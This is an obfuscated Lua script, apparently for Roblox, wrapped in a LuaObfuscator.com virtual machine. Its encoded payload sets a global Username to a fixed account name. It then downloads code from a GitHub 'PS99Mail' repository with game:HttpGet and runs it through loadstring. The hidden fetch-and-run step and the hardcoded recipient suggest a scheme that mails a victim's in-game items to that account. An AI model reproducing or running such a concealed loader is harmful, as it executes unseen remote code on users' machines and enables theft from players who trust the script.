--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=v2(v0(v30,16));if v19 then local v89=v5(v83,v19);v19=nil;return v89;else return v83;end end end);local function v20(v31,v32,v33)if v33 then local v84=0 -0 ;local v85;while true do if (v84==0) then v85=(v31/(2^(v32-1)))%((5 -3)^(((v33-(1 -(1637 -(1523 + 114)))) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v85-(v85%(932 -(857 + 67 + 7))) ;end end else local v86=(570 -(367 + 201))^(v32-((1805 -(282 + 595)) -(214 + 713))) ;return (((v31%(v86 + v86))>=v86) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(1 -0)) then return v35;end if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + (957 -(892 + 65)) ;v34=1066 -((162 -94) + 997) ;end end end local function v22()local v36=(0 -0) -0 ;local v37;local v38;while true do if (v36==(0 + 0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (7 -5) ;v36=351 -(87 + 263) ;end if (v36==(181 -(67 + 113))) then return (v38 * (188 + 68)) + v37 ;end end end local function v23()local v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (1001 -(915 + 82)) ;return (v42 * 16777216) + (v41 * (185570 -120034)) + (v40 * 256) + v39 ;end local function v24()local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,1 -0 ,20) * ((1189 -(876 + 193 + 118))^(72 -40))) + v43 ;local v47=v20(v44,793 -(201 + 571) ,67 -36 );local v48=((v20(v44,1170 -(116 + 1022) )==(1 + 0)) and  -(1 -0)) or (1 + 0) ;if (v47==0) then if (v46==((3293 -2502) -(368 + 423))) then return v48 * 0 ;else local v90=(0 + 0) -0 ;while true do if (v90==(18 -(10 + 8))) then v47=3 -2 ;v45=442 -(416 + (94 -68)) ;break;end end end elseif (v47==(6535 -4488)) then return ((v46==(0 + (0 -0))) and (v48 * ((1 -0)/(438 -(145 + 293))))) or (v48 * NaN) ;end return v8(v48,v47-(1453 -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^(17 + 35)))) ;end local function v25(v49)local v50=859 -(814 + 18 + 27) ;local v51;local v52;while true do if (v50==(2 -1)) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=2;end if (v50==(2 + 1)) then return v6(v52);end if (v50==(887 -((1235 -974) + 624))) then v52={};for v91=(3 -2) -0 , #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=3;end if (v50==(1080 -(1020 + 60))) then v51=nil;if  not v49 then v49=v23();if (v49==((3170 -(760 + 987)) -(630 + 793))) then return "";end end v50=3 -2 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=0;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v53==(5 -3)) then v58=nil;v59=nil;v53=3 + 0 ;end if (v53==4) then while true do if (v54==(244 -(187 + 54))) then v61=nil;while true do local v100=780 -(162 + 618) ;while true do if ((1 + 0)==v100) then if (v55==(2 + 0)) then local v101=0 -0 ;while true do if ((0 -0)~=v101) then else for v141=1 + 0 ,v23() do local v142=0;local v143;while true do if (v142~=0) then else v143=v21();if (v20(v143,1637 -(1373 + 263) ,1)==0) then local v164=0;local v165;local v166;local v167;local v168;while true do if (v164~=2) then else while true do if (v165==(1002 -(451 + 549))) then local v175=0 + 0 ;while true do if (v175~=0) then else if (v20(v167,1,1)~=(1 -0)) then else v168[2 -0 ]=v61[v168[1386 -(746 + 638) ]];end if (v20(v167,1 + 1 ,2)==(1 -0)) then v168[3]=v61[v168[3]];end v175=1;end if (v175==(342 -(218 + 123))) then v165=3;break;end end end if (v165==(1581 -(1535 + 46))) then local v176=0 + 0 ;while true do if (v176~=(1 + 0)) then else v165=561 -(306 + 254) ;break;end if (v176==(0 + 0)) then local v185=0 -0 ;while true do if (v185==1) then v176=1;break;end if (0==v185) then v166=v20(v143,1469 -(899 + 568) ,2 + 1 );v167=v20(v143,9 -5 ,6);v185=1;end end end end end if (v165==3) then if (v20(v167,606 -(268 + 335) ,293 -(60 + 230) )~=1) then else v168[576 -(426 + 146) ]=v61[v168[1 + 3 ]];end v56[v141]=v168;break;end if (1~=v165) then else v168={v22(),v22(),nil,nil};if (v166==0) then local v182=0;local v183;local v184;while true do if (v182~=(0 -0)) then else v183=0 + 0 ;v184=nil;v182=1025 -(706 + 318) ;end if (v182==1) then while true do if (0==v183) then v184=1251 -(721 + 530) ;while true do if (v184==(1271 -(945 + 326))) then v168[3]=v22();v168[4]=v22();break;end end break;end end break;end end elseif (v166==1) then v168[7 -4 ]=v23();elseif (v166==2) then v168[3 + 0 ]=v23() -(2^(716 -(271 + 429))) ;elseif (v166==(3 + 0)) then local v193=0;local v194;local v195;while true do if ((1500 -(1408 + 92))~=v193) then else v194=1086 -(461 + 625) ;v195=nil;v193=1289 -(993 + 295) ;end if (v193==(1 + 0)) then while true do if (0~=v194) then else v195=1171 -(418 + 753) ;while true do if (0==v195) then v168[3]=v23() -(2^16) ;v168[2 + 2 ]=v22();break;end end break;end end break;end end end v165=2;end end break;end if (v164~=(1 + 0)) then else v167=nil;v168=nil;v164=1 + 1 ;end if (v164==(0 + 0)) then v165=529 -(406 + 123) ;v166=nil;v164=1770 -(1749 + 20) ;end end end break;end end end for v144=1,v23() do v57[v144-1 ]=v28();end v101=1;end if ((1 + 0)==v101) then return v59;end end end break;end if (v100==(1322 -(1249 + 73))) then if (v55~=(0 + 0)) then else local v102=0;local v103;while true do if (v102==(1145 -(466 + 679))) then v103=0;while true do if (v103==(2 -1)) then local v160=0;while true do if ((0 -0)==v160) then v58={};v59={v56,v57,nil,v58};v160=1 + 0 ;end if (v160==(1 + 0)) then v103=5 -3 ;break;end end end if (v103==(5 -3)) then v55=1;break;end if (v103~=0) then else v56={};v57={};v103=115 -(4 + 110) ;end end break;end end end if (v55~=(585 -(57 + 527))) then else local v104=1427 -(41 + 1386) ;local v105;while true do if (v104==0) then v105=103 -(17 + 86) ;while true do if (v105~=2) then else v55=2 + 0 ;break;end if (v105==(0 -0)) then v60=v23();v61={};v105=2 -1 ;end if (v105==1) then local v161=0;while true do if (v161==(167 -(122 + 44))) then v105=2 -0 ;break;end if (v161==0) then for v170=3 -2 ,v60 do local v171=0;local v172;local v173;local v174;while true do if (v171==(1 + 0)) then v174=nil;while true do if (0==v172) then local v178=0 + 0 ;while true do if (v178==(1 -0)) then v172=66 -(30 + 35) ;break;end if (v178==(0 + 0)) then local v187=0;while true do if ((1257 -(1043 + 214))==v187) then v173=v21();v174=nil;v187=3 -2 ;end if (v187==(1213 -(323 + 889))) then v178=2 -1 ;break;end end end end end if (v172~=(581 -(361 + 219))) then else if (v173==1) then v174=v21()~=0 ;elseif (v173==(322 -(53 + 267))) then v174=v24();elseif (v173~=(1 + 2)) then else v174=v25();end v61[v170]=v174;break;end end break;end if (v171==(413 -(15 + 398))) then v172=982 -(18 + 964) ;v173=nil;v171=1;end end end v59[11 -8 ]=v21();v161=1;end end end end break;end end end v100=1;end end end break;end if (v54~=0) then else local v99=0 + 0 ;while true do if (v99==0) then v55=0 + 0 ;v56=nil;v99=1;end if ((851 -(20 + 830))==v99) then v54=1 + 0 ;break;end end end if (v54~=(127 -(116 + 10))) then else v57=nil;v58=nil;v54=1 + 1 ;end if ((740 -(542 + 196))==v54) then v59=nil;v60=nil;v54=3;end end break;end if (v53==3) then v60=nil;v61=nil;v53=8 -4 ;end if (0==v53) then v54=0;v55=nil;v53=1;end if (v53==(1 + 0)) then v56=nil;v57=nil;v53=2 + 0 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==1) then if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81>0) then local v106=v80[2];v78[v106]=v78[v106](v13(v78,v106 + 1 ,v73));else local v108=v80[2];v78[v108]=v78[v108](v13(v78,v108 + 1 ,v73));end elseif (v81<=2) then local v110=v80[2];local v111=v78[v80[3]];v78[v110 + 1 ]=v111;v78[v110]=v111[v80[4]];elseif (v81>3) then local v120=v80[2];local v121,v122=v71(v78[v120](v13(v78,v120 + 1 ,v80[3])));v73=(v122 + v120) -1 ;local v123=0;for v146=v120,v73 do v123=v123 + 1 ;v78[v146]=v121[v123];end else v64[v80[3]]=v78[v80[2]];end elseif (v81<=7) then if (v81<=5) then do return;end elseif (v81>6) then v78[v80[2]]=v80[3];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81<=8) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81>9) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end else for v149=v80[2],v80[3] do v78[v149]=nil;end end elseif (v81<=15) then if (v81<=12) then if (v81==11) then v78[v80[2]]=v80[3];else v72=v80[3];end elseif (v81<=13) then v78[v80[2]]();elseif (v81>14) then for v151=v80[2],v80[3] do v78[v151]=nil;end else local v131=v80[2];local v132=v78[v80[3]];v78[v131 + 1 ]=v132;v78[v131]=v132[v80[4]];end elseif (v81<=18) then if (v81<=16) then v78[v80[2]]();elseif (v81==17) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else local v136=v80[2];local v137,v138=v71(v78[v136](v13(v78,v136 + 1 ,v80[3])));v73=(v138 + v136) -1 ;local v139=0;for v153=v136,v73 do local v154=0;while true do if (v154==0) then v139=v139 + 1 ;v78[v153]=v137[v139];break;end end end end elseif (v81<=19) then v64[v80[3]]=v78[v80[2]];elseif (v81>20) then v72=v80[3];else do return;end end v72=v72 + 1 ;break;end if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!073O00028O0003083O00557365726E616D65030D3O0062616279666F726B692O6C6572030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403433O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F50532O394D61696C2F6D61696E2F4D656D656E746F6D6F726900153O00120B3O00014O0009000100013O0026113O00020001000100040C3O0002000100120B000100013O002611000100050001000100040C3O0005000100120B000200033O001203000200023O001208000200043O001208000300053O00200200030003000600120B000500074O0012000300056O00023O00022O000D00020001000100040C3O0014000100040C3O0005000100040C3O0014000100040C3O000200012O00053O00017O00",v9(),...);
